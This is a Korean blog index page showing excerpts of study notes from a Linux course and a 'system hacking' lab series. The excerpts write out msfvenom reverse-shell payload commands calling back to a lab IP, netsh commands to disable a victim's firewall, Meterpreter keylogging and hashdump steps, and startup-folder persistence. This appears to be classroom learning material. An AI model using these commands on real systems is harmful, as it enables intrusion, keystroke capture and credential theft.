본문 바로가기

분류 전체보기153

리눅스 마스터 5 [2024.06.29] 01. 문자열 추출 1) cut#cut [필드] [파일명] > [TAB] 키로 단어 구분 #cut -f1 passwd  #cut -f1,3 yrg.txt  #cut -f1-4 yrg.txt    파일을 만들 때 TAB 키가 아닌 스페이스로 띄어쓰기를 하면 적용이 되지 않고 화면처럼 보인다  다시 TAB 키를 이용하여 띄어쓰기 수정  수정 후 명령어를 다시 실행하면 첫 번째 문자열을 추출한다  f2를 넣게 되면 두 번째 문자열 추출     이렇게 연속으로 추출하고 싶을 때 사용할 수 있는 명령어다   -d:의 경우 콜론(:)을 필드 구분자로 지정하기 때문에첫 번째 필드의 콜론(:)을 기준으로 문자열을 추출한다  확인을 위해 기존 passwd 파일 확인 시 앞에 오는 문자만 추출된 .. 2024. 6. 30.
시스템 해킹 15 [2024.06.28] 01. 방화벽 비활성화/활성화 c:\netsh firewall set opmode mode=disable  c:\netsh firewall set opmode mode=enable      오늘은 첫 번째로 진행할 실습은 방화벽 비활성화 및 활성화다Kali linux에서 2008에 침투를 시도하고 shell 사용 화면을 만들어 놓는다  2008에서는 꺼져 있던 방화벽을 다시 켠다  다시 Kali linux에서 명령어를 실행  2008로 가서 확인해 보면 켜기를 설정해 놨던 방화벽이 다시 꺼짐 상태로 확인된다  반대로 꺼진 상태에서 켜는 명령어는 disable에서 enable로 변경만 해 주면 된다    명령어를 입력하고 다시 2008로 확인 시 켜져 있는 화면을 볼 수 있다  이번.. 2024. 6. 29.
시스템 해킹 14 [2024.06.27] [Key Logger] 01. 메모장 실행 02. >ps   03. >migrate 1234 04. > run post/windows/capture/keylog_recorder 05. 메모장에 타이핑 06. CTRL+C로 저장 07. #cat/root/.msf4/loot/20240627210626_default_192.168.10.201_host.windows.key_260383.txt   오늘 실습의 시작은 지난 시간에 배운 걸 복습 개념으로 다시 시도해 본다   2008도 똑같이 shell:startup을 실행해 주고 바탕화면에 있는 win10_m.exe를 복사 붙여넣기 한다 *2008 이후로 보안이 강화되어 2008에서는 레지스트리를 할 필요가 없다    시작 프로그램에 악성.. 2024. 6. 28.
시스템 해킹 13 [2024.06.26] [Reverse TCP] 01. 악성코드 생성 #msfvenom -p windows/x64/shell/reverse_tcp lhost=192.168.10.250 lport=4444 -f exe > /root/win10.exe #msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.250 lport=4444 -f exe > /root/win10_m.exe #vi reverse.rc use exploit/multi/handlerset payload windows/x64/shell/reverse_tcpset lhost 192.168.10.250set lport 4444set exitonsession falseexploit -.. 2024. 6. 27.
시스템 해킹 12 [2024.06.25] [Windows 7] > set payload windows/x64/meterpreter/bind_tcp> set payload windows/x64/meterpreter/bind_tcp> set rhost 192.168.10.201> exploit > sysinfo: 시스템 정보 출력> screenshot: 공격 대상자의 화면 저장> screenshare: 실시간 화면 공유> hashdump: 패스워드 덤핑> migrate: 프로세스 권한 탈취/획득 > mkdir: 디렉터리 생성> rmdir: 디렉터리 삭제> upload: 파일 올리기> download: 파일 내려받기> pwd: 현재 디렉터리> dir: 파일/디렉터리 목록 출력> ifconfig: IP 정보 출력(침투 시 사용 .. 2024. 6. 26.
시스템 해킹 11 [2024.06.24][Password Crack] 01. 소스 다운로드 및 묶음 해제 #tar -xvf John_the_Ripper_C_소스_john-1.7.8.tar #cd /home/test/john-1.7.8/src#vi Makefile LDFLAGS= -s -lcrypt    먼저 John 파일을 root에 넣기 위해CentOS 7 위치를 열어 다른 위치를 눌러 컴퓨터를 클릭한다  컴퓨터를 누르게 되면 해당 위치들이 나오는데 이 중에서 root로 들어간다   다른 곳을 눌러 들어갈 필요 없이 바로 john 파일을 넣어 준다 *USB를 이용하여 드래그 앤 드롭으로 옮기거나 메일로 저장해야 된다   다운로드한 John 파일 자체가 압축 파일이기 때문에tar 명령어를 사용하여 압축을 해제시켜 준다  .. 2024. 6. 25.